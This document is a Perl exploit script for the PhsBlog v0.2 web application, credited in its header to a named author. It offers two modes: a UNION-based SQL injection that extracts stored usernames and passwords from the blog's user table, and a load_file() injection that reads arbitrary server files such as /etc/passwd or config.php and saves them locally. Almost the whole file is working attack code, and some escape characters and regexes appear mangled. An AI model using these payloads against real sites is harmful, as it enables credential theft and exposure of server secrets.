#!/usr/bin/perl

#----------------------------------------------------------------

#

#Script : PhsBlog v0.2

#

#Type : Bypass Sql injection Filtering Exploit

#

#Method : GET

#

#Risk : High

#

#----------------------------------------------------------------

#

#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash

#

#My Official Website : HTTP://FEREIDANI.IR

#

#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com

#

#----------------------------------------------------------------

#

#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR

#

#----------------------------------------------------------------

#

#Script Download : http://www.phsdev.com/downloads/phsblog_current.zip

#

#----------------------------------------------------------------

#

# Tnx : God

#

# HTTP://IRCRASH.COM

#

#---------------------------------------------------------------- use LWP;

use HTTP::Request;

use Getopt::Long;

$scriptname="PhsBlog v0.2"; sub header

{

print "

****************************************************

* $scriptname

****************************************************

*Discovered by : Khashayar Fereidani *

*Exploited by : Khashayar Fereidani *

*My Official Website : http://fereidani.ir *

****************************************************";

} sub usage

{

print "

* Usage : perl $0 http://Example/

****************************************************

";

}

$url = ($ARGV[0]); if(!$url)

{

header();

usage();

exit;

}

if($url !~ ///){$url = $url."/";}

if($url !~ /http:///){$url = "http://".$url;}

sub xpl1()

{

#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)

$vul = "/index.php?sql_cid=999'union select 0,1,2,3,4,concat(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),6,7,8,9,10,11,12 from phsblog_users/*";

$requestpage = $url.$vul;

my $req = HTTP::Request->new("POST",$requestpage);

$ua = LWP::UserAgent->new;

$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );

#$req->referer($url);

$req->referer("IRCRASH.COM");

$req->content_type('application/x-www-form-urlencoded');

$req->header("content-length" => $contlen);

$req->content($poststring); $response = $ua->request($req);

$content = $response->content;

$header = $response->headers_as_string(); @name = split(/Login:/,$content);

$name = @name[1];

@name = split(/<enduser>/,$name);

$name = @name[0]; @password = split(/Password:/,$content);

$password = @password[1];

@password = split(/<endpass>/,$password);

$password = @password[0]; if(!$name && !$password)

{

print "nn";

print "!Exploit failed ! :(nn";

exit;

} print "n Username: ".$name."nn";

print " Password: " .$password."nn";

}

#XPL2 sub xpl2()

{

print "n Example For File Address : /home/user/public_html/config.phpn Or /etc/passwd";

print "n Enter File Address :";

$fil3 = <stdin>;

#index.php?sql_cid=999'union select 0,1,2,3,4,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),6,7,8,9,10,11,12 from phsblog_users/*

$vul = "?show=pickup&sid=99999' union select 0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13 from mysql.user/*";

$requestpage = $url.$vul; my $req = HTTP::Request->new("POST",$requestpage);

$ua = LWP::UserAgent->new;

$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );

#$req->referer($url);

$req->referer("IRCRASH.COM");

$req->content_type('application/x-www-form-urlencoded');

$req->header("content-length" => $contlen);

$req->content($poststring); $response = $ua->request($req);

$content = $response->content;

$header = $response->headers_as_string();

@name = split(/Login:/,$content);

$name = @name[1];

@name = split(/<enduser>/,$name);

$name = @name[0];

if(!$name && !$password)

{

print "nn";

print "!Exploit failed ! :(nn";

exit;

} open (FILE, ">".source.".txt");

print FILE $name;

close (FILE);

print " File Save In source.txtn";

print ""; } #XPL2 END

#Starting;

print "

****************************************************

* $scriptname

****************************************************

*Discovered by : Khashayar Fereidani *

*Exploited by : Khashayar Fereidani *

*My Official Website : http://fereidani.ir *

****************************************************

* Mod Options : *

* Mod 1 : Find Script username and password *

* Mod 2 : File Disclosure(not work in many servers)*

****************************************************";

print "n n Enter Mod : ";

$mod=<stdin>;

if ($mod=="1" or $mod=="2") { print "n Exploiting .............. n"; } else { print "n Unknown Mod ! n Exploit Failed !"; };

if ($mod=="1") { xpl1(); };

if ($mod=="2") { xpl2(); };